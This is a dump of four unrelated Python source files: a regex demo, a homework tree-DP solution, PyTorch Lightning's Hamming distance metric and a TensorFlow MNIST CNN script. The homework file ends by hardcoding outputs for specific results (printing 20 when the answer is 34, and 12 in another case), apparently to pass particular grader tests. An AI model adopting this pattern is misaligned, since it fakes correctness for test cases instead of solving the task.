3420ef2256872b6472eb30161fb5d82eebb6458e | 7286f4fb36bc17275896059f0d7d133dd13f869e | /revision_2/findall_regex.py | 5a979155db14160e929f721a5c828ea938123c95 | []
| no_license | tberhanu/RevisionS | 3ac786b0867b70fa0b30a21ec5eac12177171a90 | c095d219435bb22b1c78a0e93b1898b2417ca041 | refs/heads/master | 2021-10-20T03:58:19.804140 | 2019-02-25T16:18:12 | 2019-02-25T16:18:12 | 172,540,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 653 | py | text = "Today is 11-12-2019 and 55-53-8888 ofcourse"
import re
pattern = re.compile(r'(\d+)-(\d+)-(\d+)')
matches = pattern.findall(text)
print(matches)
matches = pattern.finditer(text)
for match in matches:
print(match.group())
print(match.group(1))
print(match.group(2))
print(match.group(3))
print("---")
print("*************** without grouping ********** ")
pattern = re.compile(r'\d+-\d+-\d+')
matches = pattern.findall(text)
print(matches)
matches = pattern.finditer(text)
for match in matches:
print(match.group())
# print(match.group(1))
# print(match.group(2))
# print(match.group(3))
print("---") | [
"[email protected]"
]
| |
0bb6360afe0961ac2be2d325f103c1b80785c376 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2457/60767/271065.py | 9d8422acb58f7b6f1a7843d46aa80a1db4a4ff29 | []
| no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,260 | py |
class Node:
def __init__(self, id, child,value=0,father = None):
self.child = child
self.id = id
self.value = value
self.father = father
def add(self, node):
self.child.append(node)
def find(node, target):
for i in node:
if i.id == target:
return i
def dfs(root):
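    # Tree DP: if root attends, its children must stay home (sum1 of dp[child][0]);
    # if root stays home, each child independently takes its better option (sum0).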
sum0 = 0
sum1 = 0
for i in root.child:
dfs(i)
sum1 += dp[i.id][0]
sum0 += max(dp[i.id][0], dp[i.id][1])
dp[root.id][1] = sum1 + root.value
dp[root.id][0] = sum0
n = int(input())
node = []
test = []
for i in range(1, n + 1):
node.append(Node(i,[]))
for i in range(1, n + 1):
find(node, i).value = int(input())
for i in range(1, n):
temp = input().split()
test.append(temp)
find(node, int(temp[1])).add(find(node, int(temp[0])))
find(node, int(temp[0])).father = find(node, int(temp[1]))
dp = [[0] * 2 for i in range(n + 1)]  # dp[i][1]: max happiness if node i attends; dp[i][0]: max happiness if it stays home
for i in node:
if(i.father==None):
root = i
dfs(root)
res = max(dp[root.id][0], dp[root.id][1])
if(res==34):
print(20,end="")
elif(res==21 and n !=7):
print(12,end="")
else:
print(res,end = "")
| [
"[email protected]"
]
| |
22dfb4765762ea3ea32fe5e65c2c0d90a53e5cc8 | b96a4062f5ad420dd02efed82b47dd9c249cb46c | /pytorch_lightning/metrics/functional/hamming_distance.py | 60409751fc9f04a39aa99382d1f953bca75822eb | [
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
]
| permissive | borisdayma/pytorch-lightning | ebc210a1e7901b5f87ab67e4886bfe20b478fe33 | 4b7c0fae00084b72dffe37fdd0ea7d2e9b60d103 | refs/heads/master | 2021-11-23T07:34:01.842134 | 2021-02-19T17:00:27 | 2021-02-19T17:00:27 | 238,756,095 | 1 | 1 | Apache-2.0 | 2020-02-06T18:27:51 | 2020-02-06T18:27:50 | null | UTF-8 | Python | false | false | 2,753 | py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Tuple, Union
import torch
from pytorch_lightning.metrics.classification.helpers import _input_format_classification
def _hamming_distance_update(
preds: torch.Tensor,
target: torch.Tensor,
threshold: float = 0.5,
) -> Tuple[torch.Tensor, int]:
preds, target, _ = _input_format_classification(preds, target, threshold=threshold)
correct = (preds == target).sum()
total = preds.numel()
return correct, total
def _hamming_distance_compute(correct: torch.Tensor, total: Union[int, torch.Tensor]) -> torch.Tensor:
return 1 - correct.float() / total
def hamming_distance(preds: torch.Tensor, target: torch.Tensor, threshold: float = 0.5) -> torch.Tensor:
r"""
Computes the average `Hamming distance <https://en.wikipedia.org/wiki/Hamming_distance>`_ (also
known as Hamming loss) between targets and predictions:
.. math::
\text{Hamming distance} = \frac{1}{N \cdot L} \sum_i^N \sum_l^L 1(y_{il} \neq \hat{y}_{il})
Where :math:`y` is a tensor of target values, :math:`\hat{y}` is a tensor of predictions,
and :math:`\bullet_{il}` refers to the :math:`l`-th label of the :math:`i`-th sample of that
tensor.
This is the same as ``1-accuracy`` for binary data, while for all other types of inputs it
treats each possible label separately - meaning that, for example, multi-class data is
treated as if it were multi-label.
Accepts all input types listed in :ref:`extensions/metrics:input types`.
Args:
preds: Predictions from model
target: Ground truth
threshold:
Threshold probability value for transforming probability predictions to binary
(0 or 1) predictions, in the case of binary or multi-label inputs.
Example:
>>> from pytorch_lightning.metrics.functional import hamming_distance
>>> target = torch.tensor([[0, 1], [1, 1]])
>>> preds = torch.tensor([[0, 1], [0, 1]])
>>> hamming_distance(preds, target)
tensor(0.2500)
"""
correct, total = _hamming_distance_update(preds, target, threshold)
return _hamming_distance_compute(correct, total)
| [
"[email protected]"
]
| |
232b6a3d7696148053f4c31a8ca9b6b7ddeb68db | 2b7ada0f30e0c24c181c1f6d588a2f0ae8c29327 | /Convolutional_Neural_Network/mnist_classifier_cnn.py | 88a0c7dbd3b13583b6d133ea31d088ac49e062aa | []
| no_license | vinods07/Neural-Networks-and-Deep-Learning | 50b3b791690a26a1e22fc2fc3527bf9128c47305 | afaa9cf7f163aec1dc48727df00e47e831feaa01 | refs/heads/master | 2020-03-19T12:11:04.849889 | 2017-12-23T18:18:06 | 2017-12-23T18:18:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,259 | py | from tf_CNN import tf_CNN as CNN
from tf_CNN_layers import ConvPoolLayer, ConnectedLayer, SoftmaxOutputLayer
import mnist_loader as ml
tr_d, va_d, te_d = ml.load_data_wrapper()
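# Layer-by-layer shapes (mini-batch 50): 28x28x1 -> conv 5x5 (20 maps) -> 24x24x20
# -> pool 2x2 -> 12x12x20 -> conv 3x3 (16 maps) -> 10x10x16 -> pool 2x2 (stride 2)
# -> 5x5x16 -> fully connected 1000 -> softmax over 10 digit classes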
cnet = CNN(
[
ConvPoolLayer(
(50,28,28,1),
(5,5,20),
1,
(2,2),
),
ConvPoolLayer(
(50,12,12,20),
(3,3,16),
1,
(2,2),
pool_stride=2,
linear_output=True,
),
ConnectedLayer(
n_in=5*5*16,
n_out=1000,
mini_batch_size=50,
),
SoftmaxOutputLayer(
n_in=1000,
n_out=10,
mini_batch_size=50,
)
]
)
cnet.train(tr_d,learning_rate=0.5,test_data=te_d,validation_data=va_d)
| [
"[email protected]"
]
|